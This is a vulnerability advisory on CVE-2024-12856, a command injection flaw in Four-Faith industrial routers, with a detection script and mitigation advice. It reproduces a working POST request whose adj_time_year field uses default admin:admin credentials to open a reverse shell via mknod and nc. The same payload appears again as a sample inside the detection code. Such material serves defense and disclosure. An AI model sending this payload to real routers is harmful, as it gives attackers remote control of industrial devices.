A significant post-authentication vulnerability affecting Four-Faith industrial routers has been actively exploited in the wild.
Tracked as CVE-2024-12856, the flaw allows attackers to perform what is effectively unauthenticated remote command injection wherever the routers’ default credentials remain in use.
Details of the Exploitation
The vulnerability impacts at least two Four-Faith router models—F3x24 and F3x36.
The injection goes through the /apply.cgi endpoint over HTTP, via the adj_time_year parameter of a system time change request (submit_type=adjust_sys_time).
Attackers have been able to inject OS commands, which can be used to gain unauthorized remote access or launch reverse shells. A real-world example of the malicious payload sent via a POST request is as follows:
POST /apply.cgi HTTP/1.1
Host: 192.168.1.1:90
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Content-Length: 296
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

adj_time_sec=32&change_action=gozila_cgi&adj_time_day=27&adj_time_mon=10&adj_time_hour=11&adj_time_year=%24%28cd+%2Ftmp%2F%3B+mknod+bOY+p%3Bcat+bOY%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.1.206+1270+%3EbOY%3B+rm+bOY%3B%29&adj_time_min=35&submit_button=index&action=Save&submit_type=adjust_sys_time
Once the request is processed, the injected commands run on the device. The resulting processes on a vulnerable router look like this:
20938 admin    1640 S   sh -c rtc_tm ss $(cd /tmp/; mknod WaO p;cat WaO|/bin
20943 admin    1636 S   /bin/sh -i
20945 admin    1636 S   nc 192.168.1.206 1270
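A log-side check for the request pattern shown above, written here as an added example; it is not part of the original advisory and is not the Suricata rule VulnCheck published. The function names and the two sample request bodies are constructed for this illustration, the malicious one reusing the advisory's payload shape; the rule is simply that every adj_time_* value in an adjust_sys_time request must be purely numeric, and that the Basic Authorization header should never decode to the factory admin:admin pair.

```python
import base64
from urllib.parse import parse_qs

# Constructed samples: the first reuses the request body shape from the advisory
# (command injection in adj_time_year); the second is a legitimate time change.
MALICIOUS_BODY = (
    "adj_time_sec=32&change_action=gozila_cgi&adj_time_day=27&adj_time_mon=10"
    "&adj_time_hour=11&adj_time_year=%24%28cd+%2Ftmp%2F%3B+mknod+bOY+p%3Bcat+bOY"
    "%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.1.206+1270+%3EbOY%3B+rm+bOY%3B%29"
    "&adj_time_min=35&submit_button=index&action=Save&submit_type=adjust_sys_time"
)
BENIGN_BODY = (
    "adj_time_sec=0&change_action=gozila_cgi&adj_time_day=27&adj_time_mon=10"
    "&adj_time_hour=11&adj_time_year=2024&adj_time_min=35&submit_button=index"
    "&action=Save&submit_type=adjust_sys_time"
)

def default_creds_used(headers):
    """True if the HTTP Basic Authorization header carries the factory admin:admin pair."""
    auth = headers.get("Authorization", "")
    if not auth.startswith("Basic "):
        return False
    try:
        decoded = base64.b64decode(auth[6:], validate=True).decode("ascii", "replace")
    except ValueError:  # malformed base64 is not a match, just noise
        return False
    return decoded == "admin:admin"

def inspect_apply_cgi(path, headers, body):
    """Return findings for one POST; an empty list means nothing suspicious was seen."""
    findings = []
    if path.split("?", 1)[0] != "/apply.cgi":
        return findings
    form = parse_qs(body, keep_blank_values=True)  # also URL-decodes the values
    if form.get("submit_type") == ["adjust_sys_time"]:
        # Every adj_time_* field is a clock component and must be purely numeric.
        for key, values in form.items():
            if key.startswith("adj_time_"):
                for value in values:
                    if not value.isdigit():
                        findings.append(f"non-numeric {key}={value!r}")
    if default_creds_used(headers):
        findings.append("default credentials admin:admin in use")
    return findings

if __name__ == "__main__":
    hdrs = {"Authorization": "Basic YWRtaW46YWRtaW4="}
    for label, body in (("malicious", MALICIOUS_BODY), ("benign", BENIGN_BODY)):
        print(label, inspect_apply_cgi("/apply.cgi", hdrs, body))
```

Feeding the same check the parsed request from the advisory yields two findings: the non-numeric adj_time_year value and the default admin:admin credentials.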
VulnCheck observed malicious activity from the IP address 178.215.238[.]91, attempting to exploit this vulnerability with a payload matching earlier patterns.
A related blog post from November 2024 also documented similar exploitation attempts, confirming this vulnerability’s active exploitation in the wild.
Organizations using Four-Faith routers are strongly encouraged to:
- Change Default Credentials: Immediately update the default login credentials to secure values.
- Patch Systems: Consult Four-Faith for available firmware updates or patches targeting CVE-2024-12856.
- Monitor Network Traffic: Deploy the Suricata rule provided to detect ongoing exploit attempts.
- Segregate Networks: Isolate industrial control systems (ICS) from external networks to reduce attack vectors.
By addressing this vulnerability proactively, organizations can mitigate the risks posed by CVE-2024-12856.